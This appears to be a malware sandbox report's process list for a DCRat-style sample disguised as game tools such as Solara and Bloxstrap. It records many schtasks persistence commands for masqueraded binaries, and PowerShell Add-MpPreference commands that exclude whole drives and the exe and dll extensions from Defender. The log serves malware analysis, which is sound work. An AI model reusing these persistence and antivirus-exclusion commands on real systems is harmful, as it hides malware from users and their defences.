PID 4084 wrote to memory of 924 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 924 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe

"C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\SysWOW64\msiexec.exe

"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "faildsfsdff" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "faildsfsdf" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "faildsfsdff" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding D65C21151CFAD8EA15E1C659DA8D6DC6

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /f

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 5BA32F3C6927AC0EC167C8219E706692

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SolaraBootstrapper" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Windows\Cursors\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Pictures\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default\Pictures\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Pictures\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\fr-FR\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\fr-FR\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\winNet\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\winNet\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\winNet\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\winNet\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\winNet\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 10 /tr "'C:\winNet\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Documents\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\Registry.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\fr-FR\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\cmd.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\sysmon.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Refcrt.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZgZhaJuw4k.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Cursors\smss.exe

"C:\Windows\Cursors\smss.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wXWS1pp4ya.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yuwvmi3t\yuwvmi3t.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES470.tmp" "c:\Recovery\WindowsRE\CSCC7783D3289374321A5F2785D92A2CEE9.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\camgvsp2\camgvsp2.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D7.tmp" "c:\Program Files (x86)\Microsoft.NET\RedistList\CSC7A0F739559C14E76B9FCB2905B968626.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dqs4vyuy\dqs4vyuy.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B2.tmp" "c:\Recovery\WindowsRE\CSC9D15F18DF25B4EBC9AFC5D7EFCDC912E.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\unbjjxr2\unbjjxr2.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES73E.tmp" "c:\Windows\Vss\Writers\Application\CSC1695FE976BC94F94849813BF48BB424.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wo0r4xno\wo0r4xno.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES867.tmp" "c:\Windows\SKB\LanguageModels\CSCF579D11E63E4D1AA25EA79FCBFF6CC.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avbd4xd1\avbd4xd1.cmdline"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES961.tmp" "c:\Program Files\WindowsPowerShell\CSCBA97CDFE29334993A62C13D44C919133.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hwun14pc\hwun14pc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6B.tmp" "c:\Program Files\Uninstall Information\CSC7DE149071344984BABDF789467E5B10.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zdiymwed\zdiymwed.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB65.tmp" "c:\Program Files (x86)\Internet Explorer\ja-JP\CSC7EF3102F42B4454780319C960827883.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2pkbp2db\2pkbp2db.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC30.tmp" "c:\Users\Default\Pictures\CSC153B9179EE0B46AA9D569016ABEAE6.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2jgjupzb\2jgjupzb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC0.tmp" "c:\Recovery\WindowsRE\CSC6D4CDB6BEEFF47A79AD646A942B52992.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2mua0gou\2mua0gou.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10A5.tmp" "c:\Users\All Users\Documents\CSC84F997DF90245D3B8FB2CA93EAEE763.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3fqzhcs1\3fqzhcs1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11CE.tmp" "c:\DriversavessessionDlldhcp\CSC3597879E6DB949CA948CF8F65C6C1C2B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cqtzcw4y\cqtzcw4y.cmdline"

